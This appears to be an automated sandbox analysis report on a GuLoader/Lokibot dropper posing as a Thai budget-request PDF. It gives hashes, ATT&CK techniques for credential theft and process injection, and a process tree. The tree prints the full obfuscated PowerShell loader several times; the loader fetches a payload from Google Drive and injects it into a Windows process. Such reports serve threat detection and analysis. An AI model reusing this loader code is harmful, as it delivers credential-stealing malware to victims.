guloader | e7bfea4e30fcde02ae0231752d4fe8971ad9b5cfdf5b77a3a6313e54777a46a3

General

Target

คำขอจัดสรรงบประมาณ 09-17-2024·pdf.vbs
Size

32KB
MD5

f86db186324ba1041c28ec03385013eb
SHA1

55334ef1aaca04dcca4bd5fde434272440b882cf
SHA256

13d2d3d9d17bd6ad8f75ba47c24f65f41641a59c353825a577075b34740adf8d
SHA512

bbe161665741d7a0a1c0575321385e5557a1fcfd8155c40a28c53d9c4734ba76e73d6b5bcc0efea1916d16b69aa4b59d697117639f8053460bddbf5fb3d127a0
SSDEEP

384:Z9vOg3ezwXxR+gMJjRK7A4a88pk/Biyc2mmev5Nil3uCHgp:Zp3eGR+gMJdAPMRyG1i4Jp

Score

10^/10

guloader lokibot collection credential_access discovery downloader spyware stealer trojan

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
Lokibot
Lokibot is a Password and CryptoCoin Wallet Stealer.
trojan spyware stealer lokibot
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Blocklisted process makes network request 2 IoCs

flow	pid	Process
3	2880	powershell.exe
5	2880	powershell.exe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	wabmig.exe
Key opened	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	wabmig.exe
Key opened	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	wabmig.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
2	drive.google.com
3	drive.google.com
8	drive.google.com

Network Service Discovery 1 TTPs 3 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
2880	powershell.exe
2664	cmd.exe
2672	powershell.exe

Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

pid	Process
2984	wabmig.exe
2984	wabmig.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2672	powershell.exe
2984	wabmig.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2672 set thread context of 2984	2672	powershell.exe	36

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wabmig.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
2672	powershell.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2880	powershell.exe
2672	powershell.exe
2672	powershell.exe

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
2672	powershell.exe
2672	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2880	powershell.exe
Token: SeDebugPrivilege	2672	powershell.exe
Token: SeDebugPrivilege	2984	wabmig.exe

Suspicious use of WriteProcessMemory 27 IoCs

description	pid	Process	procid_target
PID 1044 wrote to memory of 2880	1044	WScript.exe	28
PID 1044 wrote to memory of 2880	1044	WScript.exe	28
PID 1044 wrote to memory of 2880	1044	WScript.exe	28
PID 2880 wrote to memory of 2372	2880	powershell.exe	30
PID 2880 wrote to memory of 2372	2880	powershell.exe	30
PID 2880 wrote to memory of 2372	2880	powershell.exe	30
PID 2880 wrote to memory of 2664	2880	powershell.exe	32
PID 2880 wrote to memory of 2664	2880	powershell.exe	32
PID 2880 wrote to memory of 2664	2880	powershell.exe	32
PID 2664 wrote to memory of 2672	2664	cmd.exe	33
PID 2664 wrote to memory of 2672	2664	cmd.exe	33
PID 2664 wrote to memory of 2672	2664	cmd.exe	33
PID 2664 wrote to memory of 2672	2664	cmd.exe	33
PID 2672 wrote to memory of 2516	2672	powershell.exe	34
PID 2672 wrote to memory of 2516	2672	powershell.exe	34
PID 2672 wrote to memory of 2516	2672	powershell.exe	34
PID 2672 wrote to memory of 2516	2672	powershell.exe	34
PID 2672 wrote to memory of 2456	2672	powershell.exe	35
PID 2672 wrote to memory of 2456	2672	powershell.exe	35
PID 2672 wrote to memory of 2456	2672	powershell.exe	35
PID 2672 wrote to memory of 2456	2672	powershell.exe	35
PID 2672 wrote to memory of 2984	2672	powershell.exe	36
PID 2672 wrote to memory of 2984	2672	powershell.exe	36
PID 2672 wrote to memory of 2984	2672	powershell.exe	36
PID 2672 wrote to memory of 2984	2672	powershell.exe	36
PID 2672 wrote to memory of 2984	2672	powershell.exe	36
PID 2672 wrote to memory of 2984	2672	powershell.exe	36

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	wabmig.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	wabmig.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\คำขอจัดสรรงบประมาณ 09-17-2024·pdf.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1044
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Kniplingen Theanthropophagy Feralin Unpurse Dissuasory Josue Acousticolateral #>;$Herremands='Horniness';<#Stumblingly Pucks Deplaceredes Fremkommeliges Sourling Evalueringsrkkeflgers #>;$jordskok=$host.PrivateData;If ($jordskok) {$systylous++;}function Blottelses($Ymernes){$montgolfier=$Ymernes.Length-$systylous;for( $talnettene=5;$talnettene -lt $montgolfier;$talnettene+=6){$Uafvrgeligt+=$Ymernes[$talnettene];}$Uafvrgeligt;}function Natteredness($Tppefalds){ & ($Magnolies) ($Tppefalds);}$Sucklers77=Blottelses 'utu,dM Koloo.ipinzTympaiRabullTranslThreeaStuk,/Bjrne5Krill.Phyto0 Reor Vent(KrediWK.uspiTaeninSp smdI,traoRottewOmfo sMyrtl Sma tNf,rtyTV.nra .lagl1,amil0Mobca.Elles0 Ch t;Cordo MorjWNrme iSp,tsnDanne6Anstt4 unne;Enthr Overhx Unbr6Panpa4.ille; Savk ,jevrMisprv an.g:Apost1Frond2 Supe1Neure.Snusk0Sukk )Whone ByggeG Hel eUe,edcMellekCha,ioR psb/Suc,e2Forma0 onho1 Cowt0.luid0S.hoo1Afndt0Vrdih1 Acut LacewF RussiSandwrAdopte aavof JacuoIllumxKrkom/Indec1 Perc2,egne1 ,bci. Anim0 ref ';$Abatic95=Blottelses 'SneglU oacSSjatteSto nr,rand- KaroATilsmGStepde Livmnte stT Relo ';$diakoners=Blottelses 'UntinhVe,tit Su mtNongepRk nos Dra :Smo d/Havom/Ne.vrdBingirKali i OystvHexaneUrtaa.FuturgVelo oS.eeto B,ysgArimalTjeneeBille.Or.kecAftrroCymblmgaveb/Prereu O.drcTampo?Makroe araxTranlpMillioBiaserJe.patFluat=RiddedCircuo ysynwSkambnionislLuftao ookia,ortbdNy.pr&Unte i nderdTak e=Cat e1Solvam Supe5CarboyhylstKOrdfo0CompuK Omnia OscieGot i_ rems5VrdikO roncQ GlycZGamonHSubtr3Komm 3Sess,RElectK PrisFSun hvSorpru,sphy4 Und x ombi_Perpe1KonstOSo.ndg FngsrUnderPKrn ePSalut5TesserAfmon ';$Phylactolaemata=Blottelses ' Fora> N.of ';$Magnolies=Blottelses 'grieci,ontaEBoligXWidde ';$Sovebeslagenes='Imagos';$Udbydelses125 = Blottelses 'kal,ieXanthcNummehBrndeoSinus Petal% SeliaModstpAutompFrakrdAcroaaE,ecttPar paPaido%Min.r\LuteiJGrundo JoserSaltvd Accob agleNondisTummiiFe ladAlga,dKvoteeLyttel OpadsHongke.estgnIn itsAnter. BeneM foeta urbt Trol K.ltu&Su ce&Mandf TraineAcinicelinohValewoAfske EkspotMao s ';Natteredness (Blottelses 'Balla$antisg B,sal GratoUnp ebWinniaSpanglunexe:A pehM KuleaLam,is eypesKomm eFl gtsDac ikn olir Modei KillvAhrimeCalaml VldisBlodte Aftrr bo.m=karbo( Lavtc bymlmNoncudReino Aceta/Folk.cCylin Menuv$ FurfUD.gdrd kabbG umayUn ead Repoe LadrlSoldrsRansoe PsyksVerde1Emiss2 For 5Antix)seria ');Natteredness (Blottelses 'Akkor$Ti,vogOmra,lAf rooBortfbFieldaSuffrlBicke:MultiSMid lk AntioRekvilEvente,agsrkLipidaFane,m RakemDedeseGlac rVersiaStormt BanaeN bednUpdar=Uroli$Be kadFib riDel.caDiabek rino Spgenobjeke StaarGa.trsUddeb.SportsFdrenpMumsdlDavociAssortTotal(newsp$RedatPAfvigh edslyJannilTongua,tilkcCounttRump.o Drivl f,lmaB,sbaeKitnimTelefa PaahtOff.raPresu) Rang ');Natteredness (Blottelses 'Sabes[Ung lNinduseMut,atdisin.gravsSFluepe BionrSammevOlieriDavidcE skueSys eP ThraoAntn iPastonBe.tatSa atMEnve aBlodtnU radaF,ittgA sereGa lirPreut] Neme:T,ito:Ri htSmask.eB.llicMor,ruIrredrEnthuiMorpht Ska,y V,llPEn.alrFormuoBremstUddanoEla tc Hvidor,vollSa va Ure e=Cimbr Leetl[StoriNFlince ProttArgyr.,ointSKapiteVrdilcCattiu eslrefteriExtratP ramy FlynP T rorDri toRemagtAfskeoa,kercSwa moAtomilUnmatTKsnehy iberpIte ie Pa r] Mano:Heter: NettT StuelEnamesTamia1Algom2val t ');$diakoners=$Skolekammeraten[0];$lyknskningstelegrammer= (Blottelses ' Br e$Bion.GStangL Ta tOfootsbvalglA urtoL Delt: ubepoptaloXanthL ntopYV rgiC,venuhSa veaEntomSBlowsi andruAnti m Path=GenevN MassENewfawNonfe-DoseroEigi b ChevJ SlumEYou hCDomflt ehnd RetrosIndfayLykkes JehuT laine Kalkm Kale.SbladNUds aeBenovtGub,t.SniglwconvoeUns,cbNi olCEpisoLNat oi ontre ofllnAfskdt');$lyknskningstelegrammer+=$Masseskrivelser[1];Natteredness ($lyknskningstelegrammer);Natteredness (Blottelses ' I fe$ObserPF ageoEcheflGrapnyHypokc ,jahh Astra FrarsVigeliarranuForham ,umm. UncaH.adeaeSe.tvaKontod Kemie LancrKara sLnmod[ Fak $ TritAGentobSkemaa.ishptAttrai NonicFyrin9Carle5 rimm] Re.s=Bombe$SvigeS Agteu .arkc E olk Krypl Trise SplirSa insSp ns7Po ic7 Mese ');$plimsoller=Blottelses 'Spher$BokarPUdb.soAcc ll cr,mySkoancS perhStinkaPrec sCockai samfuKa.ermTappe.KildeDSterloShapewBaldfnfesttlO seroBeskyaRa,gfd Sm eFCora.iIndkllreforeRrled( Ante$cnemidLeptoiAcce.aS mmekAzygooIrrecnUr.taePhonor EnersSubje,Margu$SkorppUlyd a Ofrer stoftMerkahSeroteLnud.nYderlo leptpNonreh ProgoGalmaboverriPaxilaKnack) Hell ';$parthenophobia=$Masseskrivelser[0];Natteredness (Blottelses 'Indv.$ SpagG Fo eltapetO KatoBligkiAMornelAemil:GipsihP,thaJ ColekChromuMennel Hj rTDar iuSandvRJubilEpigeonUnb g= Stil( UnveTOnt,geInters SyleT Dyks-EndosPsk bsATikroTArveah hgne S.per$OblonPPeeliaU steRAfvastS,looHCanceESeparnHows.o,yrepPrefenH S rgOQuartB pwaiNedruaregns) weis ');while (!$Hjkulturen) {Natteredness (Blottelses 'Unob $Me,acgThewil RefloPersibJayceaHyldel,nadv:U estPDaguerS denoA,phaeHorselCortiePas,icRentetRdn trMu feiRex lcUdmat=Havel$S.lestHundrrKnudeuFrat eMe.ta ') ;Natteredness $plimsoller;Natteredness (Blottelses 'Meri.SvegettSonaraBanesr Aflot,lloi-StyreS Purilp efoe Nedee ceripWitne Forsi4Genet ');Natteredness (Blottelses ' drgt$ DomngNuttelLauruoSkrutb Sem aPaatrl,fsyr: E,olHU,isojRekonkPrvepufaderlGenvotDideruMicrorReforeSqu wn Bens= bloo(GasliTAnpare FlimsAll etpast - F sfPOpfejaJor etGob ehSynba Puca$ UppipStjebaB.nders,tist ensuhOutsteFab.in SvenoSpitzp Cr,zhs lopoTematbU draiHearkaPlai,) eme ') ;Natteredness (Blottelses ' Nong$Civi gSalpilModtrocursob Kn raEpidilPilta: Cad.N YppedHo.oreTehu nIonisd HaemeObliv=San.t$ TermgSammelPassio FodrbA pelaThaipl U,vl: Sam S AgartFil ctSwagseProbosvolenkKerrtiDiadipI klupDramae,eanirquodlsTonsu+Ag,ew+ Jobu%Jelin$S ksaSOpvarkCorymoElgenl genoeCun ckMadonaBo dsm Tmmem BerleEnamorOpproaBirk.t Kar eGrundn,alor.Dynamc paano SrnuuTadesn ArretMashm ') ;$diakoners=$Skolekammeraten[$Ndende];}$Redintegrator=332465;$Executionist=29545;Natteredness (Blottelses 'S,red$ Decrg PolilForvioDen ib.veraaImplal Sanj: ShagWTalisaPolymlMiddlk fsgnyUninfrtwelfi chreVid o Conif=Tr pi Wai,eG itcheU.strtE,fen-Ar leCEndoto.aabenRumsktSu daeSilicnIhukot adop Money$Opbevp rispaJernbr eliet,drenh nrege ElevnK,opso.msvipFo dohBl ncoKutteb,oliviBakesaMetal ');Natteredness (Blottelses 'Luksu$Multig RegilBracho erhab ForuaScfinlfrag :Gilb G ndee TaksnCognaaRa stnBeylisPer,okdeka aCatelfBalisf dupze Amerds inneBedre Henst=Torsd Typhi[Lumb SLinguyXenops ovemtObispeSmrehm Skrp.TolksCDaa eoEven nBuskavscrupe tillr SyndtTaxim] Ki,l:r jec:formiFKnyt,rCochloBeredm olitBTroosaSjlefsHori eLejeb6lix v4SweepSAnsvat Et irShouciJu epnAnstagFibr (Ste.k$Fr taW PicraGuysalC conkLimity,narkrFry eiFugtteInter)Ob ek ');Natteredness (Blottelses 'Popeh$SmuldgNearll Hemao UrbabJulesa NsevlCheck:KonsimRecory Tro,cDissio SubmpmisclludhveaOrismn SndaaShend Overw= bard Navne[Bil eSUdebly UdsksTy ektMagneeKlovnmSporv.Bie,nT ThioeSpadoxDuttetMa.er. PrefEEvasinCh recBuf,eo LrkedS,ecii itidnUnp,ygSynk ]Unsis:Sej h:P.nctASkotjS OdonCKildeI mugIAboli.AcidiGGlosseArtistSmel SAdstrtConcir ArbeiKonsinHousegMenus(Bedcl$ focaG U oxe U aen Ganea o,ernFiddlsStbankKoketaAeriefCrustfS teleEuro dHybrieChiro)C nni ');Natteredness (Blottelses ',eyss$ ittegC,rtolfe nsoMiddebEx,raa TogflKrydd:KonklgNeg,ruTutstlBygged Frims Subrt BreloStenolVi.iee tillsUnt i=Therm$Bewenm totoyphonocdistioTranspSquamlL.ngfaPolydn ylskaRep s.SubpasU extuGraasbDeglusDepont DosmrAnd.liProhinnon,rgTin,s(Grumo$AdsplR orsoeBeflod Non iId.alnLissyt Da leCallugTrachrFatbaaeftertJalouoSeks.rVene ,Synce$Sold E Ancix SynteSemibchai buSlibrt HensiGatoroHe,winadoptiArransKunsttC lte)Stylt ');Natteredness $guldstoles;"
  2⤵
  - Blocklisted process makes network request
  - Network Service Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2880
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Jordbesiddelsens.Mat && echo t"
    3⤵
    PID:2372
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Kniplingen Theanthropophagy Feralin Unpurse Dissuasory Josue Acousticolateral #>;$Herremands='Horniness';<#Stumblingly Pucks Deplaceredes Fremkommeliges Sourling Evalueringsrkkeflgers #>;$jordskok=$host.PrivateData;If ($jordskok) {$systylous++;}function Blottelses($Ymernes){$montgolfier=$Ymernes.Length-$systylous;for( $talnettene=5;$talnettene -lt $montgolfier;$talnettene+=6){$Uafvrgeligt+=$Ymernes[$talnettene];}$Uafvrgeligt;}function Natteredness($Tppefalds){ & ($Magnolies) ($Tppefalds);}$Sucklers77=Blottelses 'utu,dM Koloo.ipinzTympaiRabullTranslThreeaStuk,/Bjrne5Krill.Phyto0 Reor Vent(KrediWK.uspiTaeninSp smdI,traoRottewOmfo sMyrtl Sma tNf,rtyTV.nra .lagl1,amil0Mobca.Elles0 Ch t;Cordo MorjWNrme iSp,tsnDanne6Anstt4 unne;Enthr Overhx Unbr6Panpa4.ille; Savk ,jevrMisprv an.g:Apost1Frond2 Supe1Neure.Snusk0Sukk )Whone ByggeG Hel eUe,edcMellekCha,ioR psb/Suc,e2Forma0 onho1 Cowt0.luid0S.hoo1Afndt0Vrdih1 Acut LacewF RussiSandwrAdopte aavof JacuoIllumxKrkom/Indec1 Perc2,egne1 ,bci. Anim0 ref ';$Abatic95=Blottelses 'SneglU oacSSjatteSto nr,rand- KaroATilsmGStepde Livmnte stT Relo ';$diakoners=Blottelses 'UntinhVe,tit Su mtNongepRk nos Dra :Smo d/Havom/Ne.vrdBingirKali i OystvHexaneUrtaa.FuturgVelo oS.eeto B,ysgArimalTjeneeBille.Or.kecAftrroCymblmgaveb/Prereu O.drcTampo?Makroe araxTranlpMillioBiaserJe.patFluat=RiddedCircuo ysynwSkambnionislLuftao ookia,ortbdNy.pr&Unte i nderdTak e=Cat e1Solvam Supe5CarboyhylstKOrdfo0CompuK Omnia OscieGot i_ rems5VrdikO roncQ GlycZGamonHSubtr3Komm 3Sess,RElectK PrisFSun hvSorpru,sphy4 Und x ombi_Perpe1KonstOSo.ndg FngsrUnderPKrn ePSalut5TesserAfmon ';$Phylactolaemata=Blottelses ' Fora> N.of ';$Magnolies=Blottelses 'grieci,ontaEBoligXWidde ';$Sovebeslagenes='Imagos';$Udbydelses125 = Blottelses 'kal,ieXanthcNummehBrndeoSinus Petal% SeliaModstpAutompFrakrdAcroaaE,ecttPar paPaido%Min.r\LuteiJGrundo JoserSaltvd Accob agleNondisTummiiFe ladAlga,dKvoteeLyttel OpadsHongke.estgnIn itsAnter. BeneM foeta urbt Trol K.ltu&Su ce&Mandf TraineAcinicelinohValewoAfske EkspotMao s ';Natteredness (Blottelses 'Balla$antisg B,sal GratoUnp ebWinniaSpanglunexe:A pehM KuleaLam,is eypesKomm eFl gtsDac ikn olir Modei KillvAhrimeCalaml VldisBlodte Aftrr bo.m=karbo( Lavtc bymlmNoncudReino Aceta/Folk.cCylin Menuv$ FurfUD.gdrd kabbG umayUn ead Repoe LadrlSoldrsRansoe PsyksVerde1Emiss2 For 5Antix)seria ');Natteredness (Blottelses 'Akkor$Ti,vogOmra,lAf rooBortfbFieldaSuffrlBicke:MultiSMid lk AntioRekvilEvente,agsrkLipidaFane,m RakemDedeseGlac rVersiaStormt BanaeN bednUpdar=Uroli$Be kadFib riDel.caDiabek rino Spgenobjeke StaarGa.trsUddeb.SportsFdrenpMumsdlDavociAssortTotal(newsp$RedatPAfvigh edslyJannilTongua,tilkcCounttRump.o Drivl f,lmaB,sbaeKitnimTelefa PaahtOff.raPresu) Rang ');Natteredness (Blottelses 'Sabes[Ung lNinduseMut,atdisin.gravsSFluepe BionrSammevOlieriDavidcE skueSys eP ThraoAntn iPastonBe.tatSa atMEnve aBlodtnU radaF,ittgA sereGa lirPreut] Neme:T,ito:Ri htSmask.eB.llicMor,ruIrredrEnthuiMorpht Ska,y V,llPEn.alrFormuoBremstUddanoEla tc Hvidor,vollSa va Ure e=Cimbr Leetl[StoriNFlince ProttArgyr.,ointSKapiteVrdilcCattiu eslrefteriExtratP ramy FlynP T rorDri toRemagtAfskeoa,kercSwa moAtomilUnmatTKsnehy iberpIte ie Pa r] Mano:Heter: NettT StuelEnamesTamia1Algom2val t ');$diakoners=$Skolekammeraten[0];$lyknskningstelegrammer= (Blottelses ' Br e$Bion.GStangL Ta tOfootsbvalglA urtoL Delt: ubepoptaloXanthL ntopYV rgiC,venuhSa veaEntomSBlowsi andruAnti m Path=GenevN MassENewfawNonfe-DoseroEigi b ChevJ SlumEYou hCDomflt ehnd RetrosIndfayLykkes JehuT laine Kalkm Kale.SbladNUds aeBenovtGub,t.SniglwconvoeUns,cbNi olCEpisoLNat oi ontre ofllnAfskdt');$lyknskningstelegrammer+=$Masseskrivelser[1];Natteredness ($lyknskningstelegrammer);Natteredness (Blottelses ' I fe$ObserPF ageoEcheflGrapnyHypokc ,jahh Astra FrarsVigeliarranuForham ,umm. UncaH.adeaeSe.tvaKontod Kemie LancrKara sLnmod[ Fak $ TritAGentobSkemaa.ishptAttrai NonicFyrin9Carle5 rimm] Re.s=Bombe$SvigeS Agteu .arkc E olk Krypl Trise SplirSa insSp ns7Po ic7 Mese ');$plimsoller=Blottelses 'Spher$BokarPUdb.soAcc ll cr,mySkoancS perhStinkaPrec sCockai samfuKa.ermTappe.KildeDSterloShapewBaldfnfesttlO seroBeskyaRa,gfd Sm eFCora.iIndkllreforeRrled( Ante$cnemidLeptoiAcce.aS mmekAzygooIrrecnUr.taePhonor EnersSubje,Margu$SkorppUlyd a Ofrer stoftMerkahSeroteLnud.nYderlo leptpNonreh ProgoGalmaboverriPaxilaKnack) Hell ';$parthenophobia=$Masseskrivelser[0];Natteredness (Blottelses 'Indv.$ SpagG Fo eltapetO KatoBligkiAMornelAemil:GipsihP,thaJ ColekChromuMennel Hj rTDar iuSandvRJubilEpigeonUnb g= Stil( UnveTOnt,geInters SyleT Dyks-EndosPsk bsATikroTArveah hgne S.per$OblonPPeeliaU steRAfvastS,looHCanceESeparnHows.o,yrepPrefenH S rgOQuartB pwaiNedruaregns) weis ');while (!$Hjkulturen) {Natteredness (Blottelses 'Unob $Me,acgThewil RefloPersibJayceaHyldel,nadv:U estPDaguerS denoA,phaeHorselCortiePas,icRentetRdn trMu feiRex lcUdmat=Havel$S.lestHundrrKnudeuFrat eMe.ta ') ;Natteredness $plimsoller;Natteredness (Blottelses 'Meri.SvegettSonaraBanesr Aflot,lloi-StyreS Purilp efoe Nedee ceripWitne Forsi4Genet ');Natteredness (Blottelses ' drgt$ DomngNuttelLauruoSkrutb Sem aPaatrl,fsyr: E,olHU,isojRekonkPrvepufaderlGenvotDideruMicrorReforeSqu wn Bens= bloo(GasliTAnpare FlimsAll etpast - F sfPOpfejaJor etGob ehSynba Puca$ UppipStjebaB.nders,tist ensuhOutsteFab.in SvenoSpitzp Cr,zhs lopoTematbU draiHearkaPlai,) eme ') ;Natteredness (Blottelses ' Nong$Civi gSalpilModtrocursob Kn raEpidilPilta: Cad.N YppedHo.oreTehu nIonisd HaemeObliv=San.t$ TermgSammelPassio FodrbA pelaThaipl U,vl: Sam S AgartFil ctSwagseProbosvolenkKerrtiDiadipI klupDramae,eanirquodlsTonsu+Ag,ew+ Jobu%Jelin$S ksaSOpvarkCorymoElgenl genoeCun ckMadonaBo dsm Tmmem BerleEnamorOpproaBirk.t Kar eGrundn,alor.Dynamc paano SrnuuTadesn ArretMashm ') ;$diakoners=$Skolekammeraten[$Ndende];}$Redintegrator=332465;$Executionist=29545;Natteredness (Blottelses 'S,red$ Decrg PolilForvioDen ib.veraaImplal Sanj: ShagWTalisaPolymlMiddlk fsgnyUninfrtwelfi chreVid o Conif=Tr pi Wai,eG itcheU.strtE,fen-Ar leCEndoto.aabenRumsktSu daeSilicnIhukot adop Money$Opbevp rispaJernbr eliet,drenh nrege ElevnK,opso.msvipFo dohBl ncoKutteb,oliviBakesaMetal ');Natteredness (Blottelses 'Luksu$Multig RegilBracho erhab ForuaScfinlfrag :Gilb G ndee TaksnCognaaRa stnBeylisPer,okdeka aCatelfBalisf dupze Amerds inneBedre Henst=Torsd Typhi[Lumb SLinguyXenops ovemtObispeSmrehm Skrp.TolksCDaa eoEven nBuskavscrupe tillr SyndtTaxim] Ki,l:r jec:formiFKnyt,rCochloBeredm olitBTroosaSjlefsHori eLejeb6lix v4SweepSAnsvat Et irShouciJu epnAnstagFibr (Ste.k$Fr taW PicraGuysalC conkLimity,narkrFry eiFugtteInter)Ob ek ');Natteredness (Blottelses 'Popeh$SmuldgNearll Hemao UrbabJulesa NsevlCheck:KonsimRecory Tro,cDissio SubmpmisclludhveaOrismn SndaaShend Overw= bard Navne[Bil eSUdebly UdsksTy ektMagneeKlovnmSporv.Bie,nT ThioeSpadoxDuttetMa.er. PrefEEvasinCh recBuf,eo LrkedS,ecii itidnUnp,ygSynk ]Unsis:Sej h:P.nctASkotjS OdonCKildeI mugIAboli.AcidiGGlosseArtistSmel SAdstrtConcir ArbeiKonsinHousegMenus(Bedcl$ focaG U oxe U aen Ganea o,ernFiddlsStbankKoketaAeriefCrustfS teleEuro dHybrieChiro)C nni ');Natteredness (Blottelses ',eyss$ ittegC,rtolfe nsoMiddebEx,raa TogflKrydd:KonklgNeg,ruTutstlBygged Frims Subrt BreloStenolVi.iee tillsUnt i=Therm$Bewenm totoyphonocdistioTranspSquamlL.ngfaPolydn ylskaRep s.SubpasU extuGraasbDeglusDepont DosmrAnd.liProhinnon,rgTin,s(Grumo$AdsplR orsoeBeflod Non iId.alnLissyt Da leCallugTrachrFatbaaeftertJalouoSeks.rVene ,Synce$Sold E Ancix SynteSemibchai buSlibrt HensiGatoroHe,winadoptiArransKunsttC lte)Stylt ');Natteredness $guldstoles;"
    3⤵
    - Network Service Discovery
    - Suspicious use of WriteProcessMemory
    PID:2664
  - - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Kniplingen Theanthropophagy Feralin Unpurse Dissuasory Josue Acousticolateral #>;$Herremands='Horniness';<#Stumblingly Pucks Deplaceredes Fremkommeliges Sourling Evalueringsrkkeflgers #>;$jordskok=$host.PrivateData;If ($jordskok) {$systylous++;}function Blottelses($Ymernes){$montgolfier=$Ymernes.Length-$systylous;for( $talnettene=5;$talnettene -lt $montgolfier;$talnettene+=6){$Uafvrgeligt+=$Ymernes[$talnettene];}$Uafvrgeligt;}function Natteredness($Tppefalds){ & ($Magnolies) ($Tppefalds);}$Sucklers77=Blottelses 'utu,dM Koloo.ipinzTympaiRabullTranslThreeaStuk,/Bjrne5Krill.Phyto0 Reor Vent(KrediWK.uspiTaeninSp smdI,traoRottewOmfo sMyrtl Sma tNf,rtyTV.nra .lagl1,amil0Mobca.Elles0 Ch t;Cordo MorjWNrme iSp,tsnDanne6Anstt4 unne;Enthr Overhx Unbr6Panpa4.ille; Savk ,jevrMisprv an.g:Apost1Frond2 Supe1Neure.Snusk0Sukk )Whone ByggeG Hel eUe,edcMellekCha,ioR psb/Suc,e2Forma0 onho1 Cowt0.luid0S.hoo1Afndt0Vrdih1 Acut LacewF RussiSandwrAdopte aavof JacuoIllumxKrkom/Indec1 Perc2,egne1 ,bci. Anim0 ref ';$Abatic95=Blottelses 'SneglU oacSSjatteSto nr,rand- KaroATilsmGStepde Livmnte stT Relo ';$diakoners=Blottelses 'UntinhVe,tit Su mtNongepRk nos Dra :Smo d/Havom/Ne.vrdBingirKali i OystvHexaneUrtaa.FuturgVelo oS.eeto B,ysgArimalTjeneeBille.Or.kecAftrroCymblmgaveb/Prereu O.drcTampo?Makroe araxTranlpMillioBiaserJe.patFluat=RiddedCircuo ysynwSkambnionislLuftao ookia,ortbdNy.pr&Unte i nderdTak e=Cat e1Solvam Supe5CarboyhylstKOrdfo0CompuK Omnia OscieGot i_ rems5VrdikO roncQ GlycZGamonHSubtr3Komm 3Sess,RElectK PrisFSun hvSorpru,sphy4 Und x ombi_Perpe1KonstOSo.ndg FngsrUnderPKrn ePSalut5TesserAfmon ';$Phylactolaemata=Blottelses ' Fora> N.of ';$Magnolies=Blottelses 'grieci,ontaEBoligXWidde ';$Sovebeslagenes='Imagos';$Udbydelses125 = Blottelses 'kal,ieXanthcNummehBrndeoSinus Petal% SeliaModstpAutompFrakrdAcroaaE,ecttPar paPaido%Min.r\LuteiJGrundo JoserSaltvd Accob agleNondisTummiiFe ladAlga,dKvoteeLyttel OpadsHongke.estgnIn itsAnter. BeneM foeta urbt Trol K.ltu&Su ce&Mandf TraineAcinicelinohValewoAfske EkspotMao s ';Natteredness (Blottelses 'Balla$antisg B,sal GratoUnp ebWinniaSpanglunexe:A pehM KuleaLam,is eypesKomm eFl gtsDac ikn olir Modei KillvAhrimeCalaml VldisBlodte Aftrr bo.m=karbo( Lavtc bymlmNoncudReino Aceta/Folk.cCylin Menuv$ FurfUD.gdrd kabbG umayUn ead Repoe LadrlSoldrsRansoe PsyksVerde1Emiss2 For 5Antix)seria ');Natteredness (Blottelses 'Akkor$Ti,vogOmra,lAf rooBortfbFieldaSuffrlBicke:MultiSMid lk AntioRekvilEvente,agsrkLipidaFane,m RakemDedeseGlac rVersiaStormt BanaeN bednUpdar=Uroli$Be kadFib riDel.caDiabek rino Spgenobjeke StaarGa.trsUddeb.SportsFdrenpMumsdlDavociAssortTotal(newsp$RedatPAfvigh 